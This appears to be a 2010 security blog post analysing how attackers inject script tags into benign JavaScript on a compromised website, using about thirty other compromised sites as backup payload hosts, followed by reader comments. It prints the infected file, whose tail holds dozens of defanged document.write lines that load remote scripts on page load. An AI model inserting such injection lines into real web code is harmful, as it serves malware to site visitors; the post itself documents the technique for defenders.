• Hackers Understand the Value of Backups

    Hackers have been trying new tricks to obfuscate their malicious code and sneak it surreptitiously into benign websites. This trend is ever increasing as websites are now the weakest link in the entire malware chain. Hackers discover vulnerabilities in websites, exploit them to inject malicious bad code and voila – you have at your disposal a “trusted” website – lots of web surfers will drop by, and in turn get infected with the hacker’s malicious code. This vicious cycle of malware has become a very attractive modus operandi for the dark figures of the Internet.

    Overview

    This post will show an example of a trend about which we first blogged a few months ago. We will concentrate on the way hackers use “backup-sources” to infect visitors to a compromised website. If this does not make sense yet, hold on for just a few seconds more.

    Quite recently we blogged about how hackers are using benign and useful JavaScript hosted locally on accounts managed by the website owner/admin to spread malware. Hackers have injected malicious code right into useful snippets of JavaScript which do everything from displaying menu buttons, drop down choices and much much more. Take a look at our previous findings: here.

    An Example

    Everyday we find websites which are infected with malicious code which follows the same principles. In fact, we now monitor over 1 million websites!

    Website name: ipac-bd.org
    Time of latest scan: 15:33:10 PDT on 2010/05/03

    In this example, the website was hosting JavaScript which had been compromised by a hacker. The hacker had inserted various script elements at the very end of the benign JavaScript being used by the website. It’s likely that the website owner never saw this coming, and probably did not realize what was going on until he was blacklisted.

    The “Backup” Strategy

    Take a look at the example below: clearly the hacker used multiple websites which he has compromised as the “loading point” for the malicious payload injected as part of the benign JavaScript. It’s almost funny when one realizes the number of websites this hacker has used as backups for his malicious code.

    In this example the hacker has used 30 different infected websites to try and load his malicious code. The frequency distribution of the infectious websites which the hacker has used to distribute his malware is present below. It seems that hackers understand the concept of a “backup-strategy” well. An interesting point to probe further would be to understand why the frequency distribution of the infected sites is the way it is.

    Frequency distribution of infected websites used in the transmission of malware.

    Frequency distribution of infected websites used in the transmission of malware.


    Example Code

    element.style.top    = top + 'px';
    element.style.left   = left + 'px';
    element.style.height = element._originalHeight;
    element.style.width  = element._originalWidth;
    }
    }
    
    // Safari returns margins on body which is incorrect if the child is absolutely
    // positioned.  For performance reasons, redefine Position.cumulativeOffset for
    // KHTML/WebKit only.
    if (/Konqueror|Safari|KHTML/.test(navigator.userAgent)) {
    Position.cumulativeOffset = function(element) {
    var valueT = 0, valueL = 0;
    do {
    valueT += element.offsetTop  || 0;
    valueL += element.offsetLeft || 0;
    if (element.offsetParent == document.body)
    if (Element.getStyle(element, 'position') == 'absolute') break;
    
    element = element.offsetParent;
    } while (element);
    
    return [valueL, valueT];
    }
    }
    element.style.top    = top + 'px';
    element.style.left   = left + 'px';
    element.style.height = element._originalHeight;
    element.style.width  = element._originalWidth;
    }
    }
    document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
    document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
    document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
    document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
    document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
    document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
    document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
    document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
    document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
    document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
    document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
    document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
    document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
    document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
    document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
    document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
    document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
    document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
    document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
    document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
    document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
    document.write('<script src=hxxp://1-2-3security.com/images/products_housing.php ></script>');
    document.write('<script src=hxxp://devinjarvis.com/modlogan/index.php ></script>');
    document.write('<script src=hxxp://forumonly5.com/images/gifimg.php ></script>');
    document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
    document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
    document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
    document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
    document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
    document.write('<script src=hxxp://coimbatore4u.com/WAP/default.php ></script>');
    document.write('<script src=hxxp://coimbatore4u.com/WAP/default.php ></script>');
    document.write('<script src=hxxp://coimbatore4u.com/WAP/default.php ></script>');
    document.write('<script src=hxxp://lovegunsan.kr/data_file/lovegimje/errimg.php ></script>');
    document.write('<script src=hxxp://lovegunsan.kr/data_file/lovegimje/errimg.php ></script>');
    document.write('<script src=hxxp://precilub.com/lang/favicon.php ></script>');
    document.write('<script src=hxxp://potaz.truelife.com/files/SQLyogTunnelz.php ></script>');
    document.write('<script src=hxxp://asterisk-e-services.com/server/faq.php ></script>');
    document.write('<script src=hxxp://asterisk-e-services.com/server/faq.php ></script>');
    document.write('<script src=hxxp://asterisk-e-services.com/server/faq.php ></script>');
    document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
    document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
    document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
    document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
    document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
    document.write('<script src=hxxp://bad-credit-personal-loan.co.cc/css/config.php ></script>');
    document.write('<script src=hxxp://bad-credit-personal-loan.co.cc/css/config.php ></script>');
    document.write('<script src=hxxp://foot-jobss.co.cc/wp-includes/wp-config-sample.php ></script>');
    document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
    document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
    document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
    document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
    document.write('<script src=hxxp://almos-agroliga.ru/agroaddress/woodwork.php ></script>');
    document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
    document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
    document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
    document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
    document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
    document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
    document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
    document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
    document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
    document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
    document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
    document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
    document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
    document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
    document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
    document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
    document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
    document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
    document.write('<script src=hxxp://jakojonevar.webphoto.ir/photos/restoreg.php ></script>');
    document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
    document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
    document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
    document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
    document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
    document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
    document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
    document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
    document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
    document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
    document.write('<script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php ></script>');
    document.write('<script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php ></script>');
    document.write('<script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php ></script>');
    document.write('<script src=hxxp://pracemladaboleslav.cz/wp-admin/license.php ></script>');
    document.write('<script src=hxxp://travelgenerators.com/Images/Dubai.php ></script>');
    document.write('<script src=hxxp://allocinema.net/wp-admin/wp-commentsrss2.php ></script>');
    document.write('<script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php ></script>');
    document.write('<script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php ></script>');
    document.write('<script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php ></script>');
    
    • […] everyday, are not restricted to injecting just one malicious link inside benign web pages. Consider our post about how hackers inject links to multiple compromised sites when they infect new benign […]

      Posted by Lizamoon hack: Mass SQL injection – stopthehacker.com – Jaal, LLC on March 31st

    • What exactly was the purpose of fitting a wavy curve to that data? Are you trying to say that there are some URLs that were half one address and half another and appeared in the list a fractional number of times?

      No, I didn’t think so. You’re dealing with clear categories and integer occurences; presenting that data as anything other than a bar graph is ludicrous I’m afraid.

      Posted by DaveK on April 1st

    • […] have blogged about hackers’ understanding of the necessity of failover in the past. In case any security organization identifies a website in this malware chain as being […]

      Posted by Domain Chaining Attacks – stopthehacker.com – Jaal, LLC on October 17th